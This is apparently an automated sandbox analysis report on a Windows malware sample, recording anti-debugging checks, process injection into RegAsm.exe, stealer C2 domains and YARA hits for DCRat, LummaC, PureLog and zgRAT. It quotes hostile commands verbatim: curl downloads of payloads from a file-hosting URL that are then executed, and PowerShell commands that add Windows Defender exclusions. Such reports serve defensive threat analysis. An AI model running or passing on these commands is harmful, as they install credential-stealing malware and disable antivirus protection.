Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Open window title or class name: windbgframeclass
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Open window title or class name: ollydbg.exe

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 19_2_00446730 LdrInitializeThunk,

19_2_00446730

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

0_2_00007FF735DD4BF0

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

0_2_00007FF735DD4BF0

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

0_2_00007FF735DD4BF0

Source: C:\Windows\Speech\kdmapper.exe

Code function: 12_2_00E07DEE mov eax, dword ptr fs:[00000030h]

12_2_00E07DEE

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

0_2_00007FF735DD4BF0

Source: C:\Edge\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Idle.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Idle.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DEADE8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF735DEADE8
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DFF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00DFF838
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DFF9D5 SetUnhandledExceptionFilter,	12_2_00DFF9D5
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DFFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00DFFBCA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00E08EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00E08EBD

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Speech\physmeme.exe

Code function: 17_2_02F42129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

17_2_02F42129

Injects a PE file into a foreign processes

Source: C:\Windows\Speech\physmeme.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strappystyio.shop
Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: coursedonnyre.shop
Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fossillargeiw.shop
Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tendencerangej.shop
Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appleboltelwk.shop
Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tearrybyiwo.shop
Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: captainynfanw.shop
Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: surveriysiop.shop
Source: physmeme.exe, 00000011.00000002.1340947604.0000000003F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tiddymarktwo.shop

Writes to foreign memory regions

Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B75008	Jump to behavior

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Code function: 0_2_00007FF735DDEDD0 pow,pow,pow,sqrt,mouse_event,mouse_event,_invalid_parameter_noinfo_noreturn,

0_2_00007FF735DDEDD0

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP"
Source: C:\Edge\msedge.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Idle.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\Speech\kdmapper.exe

Code function: 12_2_00DFF654 cpuid

12_2_00DFF654

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: GetLocaleInfoEx,FormatMessageA,		0_2_00007FF735DEB910
Source: C:\Windows\Speech\kdmapper.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		12_2_00DFAF0F

Source: C:\Windows\Speech\physmeme.exe	Queries volume information: C:\Windows\Speech\physmeme.exe VolumeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Idle.exe	Queries volume information: C:\Users\user\AppData\Local\Idle.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Idle.exe	Queries volume information: C:\Users\user\AppData\Local\Idle.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Idle.exe	Queries volume information: C:\Users\user\AppData\Local\Idle.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Idle.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Code function: 0_2_00007FF735DEB78C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF735DEB78C

Source: C:\Windows\Speech\kdmapper.exe

Code function: 12_2_00DEB146 GetVersionExW,

12_2_00DEB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: NCTSgL4t0B.exe, NCTSgL4t0B.exe, 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmp, NCTSgL4t0B.exe, 00000000.00000000.1230063015.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: ollydbg.exe

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000017.00000002.1537440310.00000000126C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 7576, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 23.0.msedge.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66656cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66626cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66626cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66656cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000000.1467994457.0000000000162000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 23.0.msedge.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66656cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66626cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66626cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66656cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000017.00000002.1537440310.00000000126C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 7576, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 23.0.msedge.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66656cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66626cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66626cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66656cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000000.1467994457.0000000000162000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 23.0.msedge.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66656cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66626cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66626cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.kdmapper.exe.66656cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
